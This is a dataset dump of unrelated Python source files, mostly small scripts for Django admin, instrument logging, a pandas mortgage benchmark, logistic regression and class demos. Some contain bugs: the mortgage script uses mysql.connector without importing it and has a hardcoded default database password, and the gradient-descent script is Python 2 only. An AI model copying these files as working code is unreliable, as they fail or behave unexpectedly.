admin.site.register(image_feature)
# Register your models here.
|
12,767 | 567640836ede6c1675b32b3d9b3b93cc4acbcb52 | def fact_lin_rec(n):
if n == 0:
return 1
else:
return n * fact_lin_rec(n-1)
print(fact_lin_rec(0))
print(fact_lin_rec(1))
print(fact_lin_rec(2))
print(fact_lin_rec(3))
print(fact_lin_rec(4))
print(fact_lin_rec(5))
|
12,768 | 4677d3da74b19f0bedc156090da156a2e3f722ef | # -*- coding: utf-8 -*-
"""
Created on December 27, 2020
@author: m8abdela
Measure 2-wire voltage using a multimeter (e.g. Agilent 34411A, hp 34401A)
"""
#import python modules (use anaconda prompt e.g. type 'pip install pyvisa' to install pyvisa)
import pyvisa #if does not work, import 'visa' instead
import time
import matplotlib.pyplot as plt
import scipy.io
#close plots from previous sessions
plt.close('all')
RealTimeReadings = 1;
sampleName = 'Cancinotech_PCB_SAC305_Sample1_Current_Fusing_LeftPCB';
failureflag = 0;
#variables time, temperature, resistance, voltage and current
t = []
T = []
R = []
V = []
I = []
#set file name based on time
fname=time.strftime("%y%m%d%H%M%S",time.localtime()) + sampleName #filename
#GPIB INITIALIZATION WITH
#Install 'Keysight connection expert' and 'IO Libraries Suite' to determine GPIB/USB address
rm = pyvisa.ResourceManager()
rm.list_resources()
multimeter = rm.open_resource('USB0::0x0957::0x0A07::MY48005925::0::INSTR')
tic = time.perf_counter()#start timer
# Acquisition loop: sample the DC voltage, live-plot the last 300 points and
# checkpoint all variables to a .mat file on every iteration.
# NOTE(review): failureflag is set to 0 above and never changed in this file,
# so this loop never exits and the close() calls below are unreachable —
# confirm whether a failure-detection condition is missing.
while failureflag == 0:
    toc=time.perf_counter()
    t.append(toc-tic)
    #use keysight command expert to obtain instrument-specific commands
    temp_values = multimeter.query_ascii_values(':MEASure:VOLTage:DC? %s,%s' % ('DEF', 'DEF'))
    # Convert volts to millivolts for display/storage.
    measurement = temp_values[0]*1000
    V.append(measurement)
    #real-time plotting (voltage versus time, only updates last 300 points to avoid crashing)
    plt.ion()
    ff = plt.figure(1)
    plt.cla()
    plt.plot(t[max(0, len(t)-300):],V[max(0, len(t)-300):])
    plt.xlabel('Time [s]')
    plt.ylabel('Voltage [mV]')
    plt.show()
    ff.canvas.draw()
    ff.canvas.flush_events()
    #save variables as a mat file (I, R and T stay empty in this script)
    data = {}
    data['t'] = t
    data['V'] = V
    data['I'] = I
    data['R'] = R
    data['T'] = T
    scipy.io.savemat('%s.mat' % fname, data)
    time.sleep(0.1)
#close instruments
multimeter.close()
rm.close()
12,769 | f04f886b9659b2213c79fc4db5179392d0530ca8 | # Derived from https://github.com/fschlimb/scale-out-benchs
import numpy as np
import pandas as pd
from pymapd import connect
from pandas.api.types import CategoricalDtype
from io import StringIO
from glob import glob
import os
import time
import pathlib
import sys
import argparse
def run_pd_workflow(quarter=1, year=2000, perf_file="", **kwargs):
    """Run the full pandas mortgage ETL for one quarter.

    Loads the acquisition file for (year, quarter) and the given performance
    file, builds the delinquency features, joins everything and returns
    (final DataFrame, compute time in ms).  Timings are printed along the way.

    NOTE(review): relies on the module-level `data_directory` —
    presumably assigned from the -dp CLI argument elsewhere; confirm.
    """
    t1 = time.time()
    names = pd_load_names()
    year_string = str(year) + "Q" + str(quarter) + ".txt"
    acq_file = os.path.join(data_directory, "acq", "Acquisition_" + year_string)
    print("READING DATAFILE", acq_file)
    acq_pdf = pd_load_acquisition_csv(acq_file)
    print("READING DATAFILE", perf_file)
    perf_df_tmp = pd_load_performance_csv(perf_file)
    print("read time", (time.time() - t1) * 1000)
    t1 = time.time()
    # Replace raw seller names with the canonical names from names.csv.
    acq_pdf = acq_pdf.merge(names, how='left', on=['seller_name'])
    acq_pdf.drop(columns=['seller_name'], inplace=True)
    acq_pdf['seller_name'] = acq_pdf['new']
    acq_pdf.drop(columns=['new'], inplace=True)
    pdf = perf_df_tmp
    # Feature pipeline: ever-delinquent flags -> first-delinquency dates ->
    # 12-month aggregates -> join back onto performance and acquisition data.
    everdf = create_ever_features(pdf)
    delinq_merge = create_delinq_features(pdf)
    everdf = join_ever_delinq_features(everdf, delinq_merge)
    del(delinq_merge)
    joined_df = create_joined_df(pdf, everdf)
    testdf = create_12_mon_features(joined_df)
    joined_df = combine_joined_12_mon(joined_df, testdf)
    del(testdf)
    perf_df = final_performance_delinquency(pdf, joined_df)
    del(pdf, joined_df)
    final_pdf = join_perf_acq_pdfs(perf_df, acq_pdf)
    del(perf_df)
    del(acq_pdf)
    print("compute time", (time.time() - t1) * 1000)
    final_pdf = last_mile_cleaning(final_pdf)
    exec_time = (time.time() - t1) * 1000
    print("compute time with copy to host", exec_time)
    return final_pdf, exec_time
def pd_load_performance_csv(performance_path, **kwargs):
    """ Loads performance data

    Reads a pipe-delimited, headerless Fannie Mae loan-performance file with
    an explicit column list and dtype map (date columns parsed on read).

    Parameters
    ----------
    performance_path : str
        Path to the performance datafile.

    Returns
    -------
    PD DataFrame
    """
    cols = [
        "loan_id", "monthly_reporting_period", "servicer", "interest_rate", "current_actual_upb",
        "loan_age", "remaining_months_to_legal_maturity", "adj_remaining_months_to_maturity",
        "maturity_date", "msa", "current_loan_delinquency_status", "mod_flag", "zero_balance_code",
        "zero_balance_effective_date", "last_paid_installment_date", "foreclosed_after",
        "disposition_date", "foreclosure_costs", "prop_preservation_and_repair_costs",
        "asset_recovery_costs", "misc_holding_expenses", "holding_taxes", "net_sale_proceeds",
        "credit_enhancement_proceeds", "repurchase_make_whole_proceeds", "other_foreclosure_proceeds",
        "non_interest_bearing_upb", "principal_forgiveness_upb", "repurchase_make_whole_proceeds_flag",
        "foreclosure_principal_write_off_amount", "servicing_activity_indicator"
    ]
    # Fixed dtype map: closed-vocabulary columns use CategoricalDtype so bad
    # values become NaN instead of exploding memory as object columns.
    dtypes = {
        "loan_id": np.int64,
        "monthly_reporting_period": str,
        "servicer": str,
        "interest_rate": np.float64,
        "current_actual_upb": np.float64,
        "loan_age": np.float64,
        "remaining_months_to_legal_maturity": np.float64,
        "adj_remaining_months_to_maturity": np.float64,
        "maturity_date": str,
        "msa": np.float64,
        "current_loan_delinquency_status": np.int32,
        "mod_flag": CategoricalDtype(['N', 'Y']),
        "zero_balance_code": CategoricalDtype(['01', '02', '06', '09', '03', '15', '16']),
        "zero_balance_effective_date": str,
        "last_paid_installment_date": str,
        "foreclosed_after": str,
        "disposition_date": str,
        "foreclosure_costs": np.float64,
        "prop_preservation_and_repair_costs": np.float64,
        "asset_recovery_costs": np.float64,
        "misc_holding_expenses": np.float64,
        "holding_taxes": np.float64,
        "net_sale_proceeds": np.float64,
        "credit_enhancement_proceeds": np.float64,
        "repurchase_make_whole_proceeds": np.float64,
        "other_foreclosure_proceeds": np.float64,
        "non_interest_bearing_upb": np.float64,
        "principal_forgiveness_upb": np.float64,
        "repurchase_make_whole_proceeds_flag": CategoricalDtype(['N', 'Y']),
        "foreclosure_principal_write_off_amount": np.float64,
        "servicing_activity_indicator": CategoricalDtype(['N', 'Y']),
    }
    # Columns 1/8/13/14/15/16 (reporting period, maturity and event dates)
    # are parsed as datetimes.
    return pd.read_csv(performance_path, names=cols, delimiter='|', dtype=dtypes, parse_dates=[1,8,13,14,15,16])
def pd_load_acquisition_csv(acquisition_path, **kwargs):
    """ Loads acquisition data

    Reads a pipe-delimited, headerless Fannie Mae loan-acquisition file with
    an explicit column list and dtype map (origination/first-pay dates parsed
    on read).

    Parameters
    ----------
    acquisition_path : str
        Path to the acquisition datafile.

    Returns
    -------
    PD DataFrame
    """
    columns = [
        'loan_id', 'orig_channel', 'seller_name', 'orig_interest_rate', 'orig_upb', 'orig_loan_term',
        'orig_date', 'first_pay_date', 'orig_ltv', 'orig_cltv', 'num_borrowers', 'dti', 'borrower_credit_score',
        'first_home_buyer', 'loan_purpose', 'property_type', 'num_units', 'occupancy_status', 'property_state',
        'zip', 'mortgage_insurance_percent', 'product_type', 'coborrow_credit_score', 'mortgage_insurance_type',
        'relocation_mortgage_indicator', 'year_quarter'
    ]
    dtypes = {
        'loan_id': np.int64,
        'orig_channel': CategoricalDtype(['B', 'C', 'R']),
        'seller_name': str,
        'orig_interest_rate': np.float64,
        'orig_upb': np.int64,
        'orig_loan_term': np.int64,
        'orig_date': str,
        'first_pay_date': str,
        'orig_ltv': np.float64,
        'orig_cltv': np.float64,
        'num_borrowers': np.float64,
        'dti': np.float64,
        'borrower_credit_score': np.float64,
        'first_home_buyer': CategoricalDtype(['N', 'U', 'Y']),
        'loan_purpose': CategoricalDtype(['C', 'P', 'R', 'U']),
        'property_type': CategoricalDtype(['CO', 'CP', 'MH', 'PU', 'SF']),
        'num_units': np.int64,
        'occupancy_status': CategoricalDtype(['I', 'P', 'S']),
        'property_state': CategoricalDtype(
            ['AK', 'AL', 'AR', 'AZ', 'CA', 'CO', 'CT', 'DC', 'DE', 'FL', 'GA', 'HI',
             'IA', 'ID', 'IL', 'IN', 'KS', 'KY', 'LA', 'MA', 'MD', 'ME', 'MI', 'MN',
             'MO', 'MS', 'MT', 'NC', 'ND', 'NE', 'NH', 'NJ', 'NM', 'NV', 'NY', 'OH',
             'OK', 'OR', 'PA', 'PR', 'RI', 'SC', 'SD', 'TN', 'TX', 'UT', 'VA', 'VI',
             'VT', 'WA', 'WI', 'WV', 'WY']),
        'zip': np.int64,
        'mortgage_insurance_percent': np.float64,
        'product_type': CategoricalDtype(['FRM']),
        'coborrow_credit_score': np.float64,
        'mortgage_insurance_type': np.float64,
        'relocation_mortgage_indicator': CategoricalDtype(['N', 'Y']),
        'year_quarter': np.int64
    }
    # NOTE(review): error_bad_lines/warn_bad_lines were removed in pandas 2.0
    # (replaced by on_bad_lines) — confirm the pandas version this targets.
    a = pd.read_csv(acquisition_path, names=columns, delimiter='|', dtype=dtypes, parse_dates=[6,7], error_bad_lines=True, warn_bad_lines=True, na_filter=True)
    return a
def pd_load_names(**kwargs):
    """ Loads names used for renaming the banks

    Reads names.csv (pipe-delimited, headerless) from the module-level
    `data_directory`; each row maps a raw 'seller_name' to its canonical
    'new' name.

    Returns
    -------
    PD DataFrame
    """
    cols = [
        'seller_name', 'new'
    ]
    dtypes = {'seller_name':str, 'new':str}
    return pd.read_csv(os.path.join(data_directory, "names.csv"), names=cols, delimiter='|', dtype=dtypes)
def create_ever_features(pdf, **kwargs):
    """Flag, per loan, whether it was ever 30/90/180+ days delinquent.

    Returns a frame indexed by loan_id with int8 columns 'ever_30',
    'ever_90' and 'ever_180' (status thresholds 1, 3 and 6 respectively).
    """
    status = pdf[['loan_id', 'current_loan_delinquency_status']].groupby('loan_id').max()
    del(pdf)  # drop the local reference to the (large) input frame
    for flag_name, threshold in (('ever_30', 1), ('ever_90', 3), ('ever_180', 6)):
        status[flag_name] = (status['current_loan_delinquency_status'] >= threshold).astype('int8')
    return status.drop(columns=['current_loan_delinquency_status'])
def create_delinq_features(pdf, **kwargs):
    """Compute, per loan, the first reporting period at which the loan
    reached 30/90/180-day delinquency.

    Parameters
    ----------
    pdf : pd.DataFrame
        Performance frame with 'loan_id', 'monthly_reporting_period'
        (datetime) and 'current_loan_delinquency_status' columns.

    Returns
    -------
    pd.DataFrame
        Keyed by loan_id with 'delinquency_30', 'delinquency_90' and
        'delinquency_180' datetime columns; the 90/180 columns fall back
        to the 1970-01-01 epoch sentinel for loans (with some delinquency)
        that never reached that bucket.
    """
    delinq_pdf = pdf[['loan_id', 'monthly_reporting_period', 'current_loan_delinquency_status']]
    del(pdf)  # drop the local reference to the (large) input frame

    # Epoch sentinel used throughout this pipeline for "never reached".
    epoch = np.dtype('datetime64[ms]').type('1970-01-01').astype('datetime64[ms]')

    def _first_delinq(threshold, col_name):
        # Earliest reporting period with status >= threshold, per loan.
        # (Previously this was copy-pasted three times with different
        # literals; '@threshold' resolves the local variable in query().)
        d = delinq_pdf.query('current_loan_delinquency_status >= @threshold')[
            ['loan_id', 'monthly_reporting_period']].groupby('loan_id').min()
        d[col_name] = d['monthly_reporting_period']
        d.drop(columns=['monthly_reporting_period'], inplace=True)
        return d

    delinq_merge = _first_delinq(1, 'delinquency_30')
    delinq_merge = delinq_merge.merge(_first_delinq(3, 'delinquency_90'), how='left', on=['loan_id'])
    delinq_merge['delinquency_90'] = delinq_merge['delinquency_90'].fillna(epoch)
    delinq_merge = delinq_merge.merge(_first_delinq(6, 'delinquency_180'), how='left', on=['loan_id'])
    delinq_merge['delinquency_180'] = delinq_merge['delinquency_180'].fillna(epoch)
    return delinq_merge
def join_ever_delinq_features(everdf_tmp, delinq_merge, **kwargs):
    """Left-join the first-delinquency dates onto the ever-delinquent flags,
    filling loans with no delinquency record with the 1970-01-01 epoch."""
    merged = everdf_tmp.merge(delinq_merge, on=['loan_id'], how='left')
    del(everdf_tmp)
    del(delinq_merge)
    epoch = np.dtype('datetime64[ms]').type('1970-01-01').astype('datetime64[ms]')
    for column in ('delinquency_30', 'delinquency_90', 'delinquency_180'):
        merged[column] = merged[column].fillna(epoch)
    return merged
def create_joined_df(pdf, everdf, **kwargs):
    """Build the per-row (loan, month) frame used for 12-month aggregation.

    Extracts period/status/UPB from the performance frame, renames them to
    the working names (timestamp, delinquency_12, upb_12), fills missing
    values with sentinels, and left-joins the ever/first-delinquency
    features.

    NOTE(review): `test` is a column-selection of pdf, so the assignments
    below may trigger pandas' SettingWithCopyWarning — presumably benign in
    this benchmark; confirm.
    """
    test = pdf[['loan_id', 'monthly_reporting_period', 'current_loan_delinquency_status', 'current_actual_upb']]
    del(pdf)
    test['timestamp'] = test['monthly_reporting_period']
    test.drop(columns=['monthly_reporting_period'], inplace=True)
    test['timestamp_month'] = test['timestamp'].dt.month
    test['timestamp_year'] = test['timestamp'].dt.year
    test['delinquency_12'] = test['current_loan_delinquency_status']
    test.drop(columns=['current_loan_delinquency_status'], inplace=True)
    test['upb_12'] = test['current_actual_upb']
    test.drop(columns=['current_actual_upb'], inplace=True)
    # Sentinels: missing UPB -> 999999999, missing delinquency -> -1.
    test['upb_12'] = test['upb_12'].fillna(999999999)
    test['delinquency_12'] = test['delinquency_12'].fillna(-1)
    joined_df = test.merge(everdf, how='left', on=['loan_id'])
    del(everdf)
    del(test)
    # Loans without ever/delinquency features also get the -1 sentinel.
    joined_df['ever_30'] = joined_df['ever_30'].fillna(-1)
    joined_df['ever_90'] = joined_df['ever_90'].fillna(-1)
    joined_df['ever_180'] = joined_df['ever_180'].fillna(-1)
    joined_df['delinquency_30'] = joined_df['delinquency_30'].fillna(-1)
    joined_df['delinquency_90'] = joined_df['delinquency_90'].fillna(-1)
    joined_df['delinquency_180'] = joined_df['delinquency_180'].fillna(-1)
    joined_df['timestamp_year'] = joined_df['timestamp_year'].astype('int32')
    joined_df['timestamp_month'] = joined_df['timestamp_month'].astype('int32')
    return joined_df
def create_12_mon_features(joined_df, **kwargs):
    """Aggregate delinquency/UPB over rolling 12-month windows.

    For each offset y in 1..12, rows are bucketed into 12-month windows
    (josh_mody_n) and reduced to max delinquency / min UPB per
    (loan, window); the binary label is 1 when the max delinquency exceeded
    3 or the UPB hit 0.  Results for all offsets are concatenated.

    NOTE(review): 24000 is presumably the absolute month index of year 2000
    (2000 * 12), anchoring the window arithmetic — confirm against the
    original CUDA/GPU implementation this was derived from.
    """
    testdfs = []
    n_months = 12
    for y in range(1, n_months + 1):
        tmpdf = joined_df[['loan_id', 'timestamp_year', 'timestamp_month', 'delinquency_12', 'upb_12']]
        # Absolute month index, then the 12-month bucket shifted by y.
        tmpdf['josh_months'] = tmpdf['timestamp_year'] * 12 + tmpdf['timestamp_month']
        tmpdf['josh_mody_n'] = np.floor((tmpdf['josh_months'].astype('float64') - 24000 - y) / 12)
        tmpdf = tmpdf.groupby(['loan_id', 'josh_mody_n'], as_index=False).agg({'delinquency_12': 'max','upb_12': 'min'})
        # Label: seriously delinquent (>3) or paid/written down to zero UPB.
        tmpdf['delinquency_12'] = (tmpdf['delinquency_12']>3).astype('int32')
        tmpdf['delinquency_12'] +=(tmpdf['upb_12']==0).astype('int32')
        # Map each bucket back to a concrete (year, month) join key.
        tmpdf['timestamp_year'] = np.floor(((tmpdf['josh_mody_n'] * n_months) + 24000 + (y - 1)) / 12).astype('int16')
        tmpdf['timestamp_month'] = np.int8(y)
        tmpdf.drop(columns=['josh_mody_n'], inplace=True)
        testdfs.append(tmpdf)
        del(tmpdf)
    del(joined_df)
    return pd.concat(testdfs)
def combine_joined_12_mon(joined_df, testdf, **kwargs):
    """Replace the raw per-row delinquency_12/upb_12 columns in *joined_df*
    with the aggregated 12-month features from *testdf*, joined on
    (loan_id, timestamp_year, timestamp_month).

    Note: *joined_df* is modified in place (columns dropped and key dtypes
    narrowed) before the merge, matching the original implementation.
    """
    joined_df.drop(columns=['delinquency_12', 'upb_12'], inplace=True)
    for key, dtype in (('timestamp_year', 'int16'), ('timestamp_month', 'int8')):
        joined_df[key] = joined_df[key].astype(dtype)
    return joined_df.merge(testdf, how='left', on=['loan_id', 'timestamp_year', 'timestamp_month'])
def final_performance_delinquency(merged, joined_df, **kwargs):
    """Attach the 12-month delinquency features to the performance frame,
    keyed by (loan_id, year, month) of the monthly reporting period.

    The temporary timestamp_year/timestamp_month join keys are added to
    *merged* (in place, as before) and dropped from the returned frame.
    """
    merged['timestamp_month'] = merged['monthly_reporting_period'].dt.month.astype('int8')
    merged['timestamp_year'] = merged['monthly_reporting_period'].dt.year.astype('int16')
    combined = merged.merge(joined_df, how='left', on=['loan_id', 'timestamp_year', 'timestamp_month'])
    return combined.drop(columns=['timestamp_year', 'timestamp_month'])
def join_perf_acq_pdfs(perf, acq, **kwargs):
    """Left-join the acquisition attributes onto the performance frame by loan_id."""
    combined = perf.merge(acq, on=['loan_id'], how='left')
    return combined
def last_mile_cleaning(df, **kwargs):
    """Binarize the 12-month delinquency label for model training.

    'delinquency_12' becomes 1 when the loan was flagged delinquent
    (value > 0) and 0 otherwise — including missing values, since NaN > 0
    evaluates to False — stored as int32.  (A commented-out category-decoding
    loop from the GPU version of this pipeline was removed as dead code.)
    """
    df['delinquency_12'] = df['delinquency_12'] > 0
    # fillna(False) is kept as a guard for object-dtype inputs before the cast.
    df['delinquency_12'] = df['delinquency_12'].fillna(False).astype('int32')
    return df
# Load database reporting functions
pathToReportDir = os.path.join(pathlib.Path(__file__).parent, "..", "report")
print(pathToReportDir)
sys.path.insert(1, pathToReportDir)
import report

# Command-line interface ------------------------------------------------------
parser = argparse.ArgumentParser(description='Run Mortgage benchmark using pandas')
parser.add_argument('-r', default="report_pandas.csv", help="Report file name.")
parser.add_argument('-df', default=1, type=int, help="Number of datafiles (quarters) to input into database for processing.")
parser.add_argument('-dp', required=True, help="Path to root of mortgage datafiles directory (contains names.csv).")
parser.add_argument('-i', dest="iterations", default=5, type=int, help="Number of iterations to run every benchmark. Best result is selected.")
parser.add_argument("-db-server", default="localhost", help="Host name of MySQL server")
parser.add_argument("-db-port", default=3306, type=int, help="Port number of MySQL server")
parser.add_argument("-db-user", default="", help="Username to use to connect to MySQL database. If user name is specified, script attempts to store results in MySQL database using other -db-* parameters.")
parser.add_argument("-db-pass", default="omniscidb", help="Password to use to connect to MySQL database")
parser.add_argument("-db-name", default="omniscidb", help="MySQL database to use to store benchmark results")
parser.add_argument("-db-table", help="Table to use to store results for this benchmark.")
parser.add_argument("-commit", default="1234567890123456789012345678901234567890", help="Commit hash to use to record this benchmark results")
args = parser.parse_args()

if args.df <= 0:
    print("Bad number of data files specified", args.df)
    sys.exit(1)
if args.iterations < 1:
    # BUG FIX: original printed the non-existent attribute args.t
    # (AttributeError) and then fell through without exiting.
    print("Bad number of iterations specified", args.iterations)
    sys.exit(1)

# Optional MySQL result sink --------------------------------------------------
db_reporter = None
# BUG FIX: original used 'args.db_user is not ""' -- an identity test that
# is unreliable for strings; compare with != instead.
if args.db_user != "":
    print("Connecting to database")
    db = mysql.connector.connect(host=args.db_server, port=args.db_port, user=args.db_user, passwd=args.db_pass, db=args.db_name)
    db_reporter = report.DbReport(db, args.db_table, {
        'FilesNumber': 'INT UNSIGNED NOT NULL',
        'FragmentSize': 'BIGINT UNSIGNED NOT NULL',
        'BenchName': 'VARCHAR(500) NOT NULL',
        'BestExecTimeMS': 'BIGINT UNSIGNED',
        'BestTotalTimeMS': 'BIGINT UNSIGNED',
        'WorstExecTimeMS': 'BIGINT UNSIGNED',
        'WorstTotalTimeMS': 'BIGINT UNSIGNED',
        'AverageExecTimeMS': 'BIGINT UNSIGNED',
        'AverageTotalTimeMS': 'BIGINT UNSIGNED'
    }, {
        'ScriptName': 'mortgage_pandas.py',
        'CommitHash': args.commit
    })

data_directory = args.dp
benchName = "mortgage_pandas"
perf_data_path = os.path.join(data_directory, "perf")
perf_format_path = os.path.join(perf_data_path, "Performance_%sQ%s.txt")

# Timing statistics aggregated across iterations.
bestExecTime = float("inf")
bestTotalTime = float("inf")
worstExecTime = 0
worstTotalTime = 0
avgExecTime = 0
avgTotalTime = 0

for iii in range(1, args.iterations + 1):
    dataFilesNumber = 0
    time_ETL = time.time()
    exec_time_total = 0
    print("RUNNING BENCHMARK NUMBER", benchName, "ITERATION NUMBER", iii)
    for quarter in range(0, args.df):
        # Quarters are numbered from 2000Q1; four quarters per year.
        year = 2000 + quarter // 4
        perf_file = perf_format_path % (str(year), str(quarter % 4 + 1))
        files = [f for f in pathlib.Path(perf_data_path).iterdir() if f.match('Performance_%sQ%s.txt*' % (str(year), str(quarter % 4 + 1)))]
        for f in files:
            dataframe, exec_time = run_pd_workflow(year = year, quarter = (quarter % 4 + 1), perf_file = str(f))
            exec_time_total += exec_time
            dataFilesNumber += 1
    time_ETL_end = time.time()
    ttt = (time_ETL_end - time_ETL) * 1000
    print("ITERATION", iii, "EXEC TIME: ", exec_time_total, "TOTAL TIME: ", ttt)
    if bestExecTime > exec_time_total:
        bestExecTime = exec_time_total
    if worstExecTime < exec_time_total:
        worstExecTime = exec_time_total
    avgExecTime += exec_time_total
    if bestTotalTime > ttt:
        bestTotalTime = ttt
    if worstTotalTime < ttt:
        # BUG FIX: original assigned bestTotalTime here, so the worst
        # total time was never recorded.
        worstTotalTime = ttt
    avgTotalTime += ttt

avgExecTime /= args.iterations
avgTotalTime /= args.iterations

# Emit the CSV report (and optionally the MySQL row).
try:
    # Renamed the file handle so it no longer shadows the imported
    # 'report' module.
    with open(args.r, "w") as report_file:
        print("BENCHMARK", benchName, "EXEC TIME", bestExecTime, "TOTAL TIME", bestTotalTime)
        print("datafiles,fragment_size,query,query_exec_min,query_total_min,query_exec_max,query_total_max,query_exec_avg,query_total_avg,query_error_info", file=report_file, flush=True)
        print(dataFilesNumber, ",",
              0, ",",
              benchName, ",",
              bestExecTime, ",",
              bestTotalTime, ",",
              worstExecTime, ",",
              worstTotalTime, ",",
              avgExecTime, ",",
              avgTotalTime, ",",
              "", '\n', file=report_file, sep='', end='', flush=True)
        if db_reporter is not None:
            db_reporter.submit({
                'FilesNumber': dataFilesNumber,
                'FragmentSize': 0,
                'BenchName': benchName,
                'BestExecTimeMS': bestExecTime,
                'BestTotalTimeMS': bestTotalTime,
                'WorstExecTimeMS': worstExecTime,
                'WorstTotalTimeMS': worstTotalTime,
                'AverageExecTimeMS': avgExecTime,
                'AverageTotalTimeMS': avgTotalTime})
except IOError as err:
    print("Failed writing report file", args.r, err)
|
12,770 | 5b7646765a115c011cac5bd85619613458fcbd9c | from hdlc import *
|
12,771 | 9f65465a983411f02e8cc9710ab19898d2c818b9 | from painter import Painter
def algorithm(picture, args):
    """
    Cover each row of *picture* with horizontal line segments.

    For every cell that still needs paint and is not yet covered, the
    segment is extended rightwards over consecutive filled cells and
    painted in a single paint_line call.
    """
    painter = Painter(picture.empty_copy())
    width = picture.shape[1]
    for row, col in painter.picture.positions_to_paint(picture):
        if painter.picture[row][col]:
            # Already covered by an earlier segment on this row.
            continue
        end = col
        while end + 1 < width and picture[row][end + 1]:
            end += 1
        painter.paint_line(row, col, row, end)
    return painter
|
12,772 | 3ea259588809064b6d0abcb53b7881b1bd18d91b | '''
Created on Feb 9, 2016
@author: zluo
'''
# BUG FIX: the original statement
#     from zipline.algorithm import TradingAlgorithm (...)
# was a syntax error.  TradingAlgorithm lives in zipline.algorithm, while
# the helper functions are exported by zipline.api.
from zipline.algorithm import TradingAlgorithm
from zipline.api import (
    add_history,
    history,
    order_target,
    record,
    symbol,
)
12,773 | 9f658f847396b8050ce2b8444d75b02972d85400 | import math
import numpy as NP
alpha = 0.2 #learning rate
def f(z):
    """Numerically stable logistic sigmoid, 1 / (1 + e**-z).

    The original computed 1/(1 + math.e ** (-z)), which raises
    OverflowError for large negative z; this form never exponentiates a
    positive argument, so it is safe over the whole float range.
    """
    if z >= 0:
        return 1.0 / (1.0 + math.exp(-z))
    ez = math.exp(z)
    return ez / (1.0 + ez)
def gradientDescent(x, y, theta, m, iterations=10**5, learning_rate=0.2):
    """Batch gradient descent for logistic regression.

    x           : (m, n) design matrix (first column is the bias term)
    y           : (m,) vector of 0/1 labels
    theta       : (n,) initial parameter vector
    m           : number of training examples
    iterations  : number of full-batch updates (was hard-coded to 10**5)
    learning_rate : step size (was the module-level global alpha = 0.2)

    Returns the fitted parameter vector.
    """
    xTrans = x.transpose()
    # range() works on both Python 2 and 3 (the original xrange is py2-only).
    for _ in range(iterations):
        # Vectorised sigmoid of the linear scores; replaces the original
        # per-element Python loop calling f() on each score.
        h = 1.0 / (1.0 + NP.exp(-NP.dot(x, theta)))
        loss = h - y
        gradient = NP.dot(xTrans, loss) / m
        theta = theta - learning_rate * gradient
    return theta
print "Enter the number of data points"
m = int(raw_input())
x = NP.zeros((m, 2))
y = NP.zeros(m)
print "Now enter the feature value followed by the 0 or 1 for classification"
for i in xrange(m):
x[i][1],y[i]=map(float,raw_input().split()) #input x and y coordinates
x[i][0] = 1
print "inputs done"
theta = NP.zeros(2)
theta = gradientDescent(x,y,theta,m)
print "start entering the test data"
while True:
T =float(raw_input())
print "The confidence value that the object is of type 1 is:", f(NP.dot([1,T],theta))
|
12,774 | 42e4f043291af77d766ad7b23ec8ed59e4cfd4d2 | import itertools
# Read a string and print every permutation of its characters, one per line.
word = input("String a ser permutada: ")
for perm in itertools.permutations(word, len(word)):
    print(''.join(perm))
12,775 | d24a06405b0902959c7d81634512869e24b0afdb | # Aggregation represent has-a relationship
class Salary:
    """Monthly pay plus a yearly bonus (aggregation example)."""

    def __init__(self, pay, bonus):
        self.pay = pay        # monthly pay
        self.bonus = bonus    # once-a-year bonus

    def annual_salary(self):
        """Total yearly compensation: twelve months of pay plus the bonus."""
        yearly_pay = self.pay * 12
        return yearly_pay + self.bonus
class Employee:
    """Employee that *has a* salary object (aggregation, not ownership)."""

    def __init__(self, name, age, salary):
        self.name = name
        self.age = age
        self.obj_salary = salary   # aggregated Salary-like object

    def total_salary(self):
        """Delegate the yearly total to the aggregated salary object."""
        return self.obj_salary.annual_salary()
# The association is unidirectional: the employee knows its salary object,
# and both objects live independently of each other.
monthly = Salary(15000, 10000)
worker = Employee("Rahul", 26, monthly)
print(worker.total_salary())
12,776 | 71367cba6609ba522f4433c4540c3b7270de6ee5 | from django.contrib import admin
from django.contrib.contenttypes.admin import GenericStackedInline
from ugc.models import Post
from like.models import Like
class LikeInline(GenericStackedInline):
    """Inline admin form for the generic Like attached to the edited object.

    Binds the inline through Like's generic foreign key fields
    (target_type / target_id).
    """
    ct_field = 'target_type'    # content-type FK field on Like
    ct_fk_field = 'target_id'   # object-id field on Like
    model = Like
    max_num = 1                 # show at most one Like form
class PostAdmin(admin.ModelAdmin):
    """Admin options for Post: compact change list plus inline Like editor."""
    list_display = ('author', 'short_text', 'updated_at')
    inlines = [
        LikeInline
    ]

    def short_text(self, post):
        """Return the first 30 characters of the post text for list_display."""
        return post.text[:30]
# Expose Post in the admin site with the customised PostAdmin options.
admin.site.register(Post, PostAdmin)
|
12,777 | abba228366a38232666763472ff9a5ebcfc2d5df | #!/usr/bin/python3
"""Square class"""
class Square:
    """Defines a square by its (non-negative integer) size."""

    def __init__(self, size=0):
        """Initialise the square.

        Args:
            size (int): length of one side; must be an integer >= 0.

        Raises:
            TypeError: if size is not an integer.
            ValueError: if size is negative.
        """
        # BUG FIX: the original printed the error messages (without a
        # trailing newline) and raised bare exceptions; the messages now
        # travel with the exceptions, and size is validated before being
        # stored.
        if not isinstance(size, int):
            raise TypeError("size must be an integer")
        if size < 0:
            raise ValueError("size must be >= 0")
        self.__size = size
|
12,778 | 9ef569cf08f3d1f1b7394338f8c1db3fde88a18a | from calcDiscriminatives import calcDisc
from tabelsB import makeTables
# Maps task name -> numeric task id expected by makeTables().
taskID={"digestion-Cogs":1, "phylogenetic-Cogs":2, "digestion-Operons":3, "phylogenetic-Operons":4}
# COG identity-percentage thresholds to sweep.
cogsPrecent = ["30", "40", "50", "60", "80", "90"]
def main():
    """Run the discriminative-feature computation for every task."""
    tasks = (("digestion-Cogs", 3),
             ("phylogenetic-Cogs", 8),
             ("digestion-Operons", 3),
             ("phylogenetic-Operons", 8))
    for task_name, n_classes in tasks:
        print(task_name)
        sendParameters(task_name, n_classes)
def sendParameters(taskName, classesAmount):
    """For each identity threshold, compare every unordered pair of classes.

    Fetches the two class matrices via makeTables and, when both are
    non-empty, hands them to calcDisc; otherwise reports the skipped pair.
    """
    upper = classesAmount + 1   # range() end is exclusive
    for percent in cogsPrecent:
        for first in range(1, upper):
            for second in range(first + 1, upper):
                m1, m2, name1, name2, n_cogs = makeTables(first, second, taskID[taskName], percent)
                if len(m1) > 0 and len(m2) > 0:
                    calcDisc(m1, m2, taskName, percent, name1, name2, n_cogs)
                else:
                    print("skipping classes ", name1, name2)
# Script entry point.
if __name__ == "__main__":
    main()
|
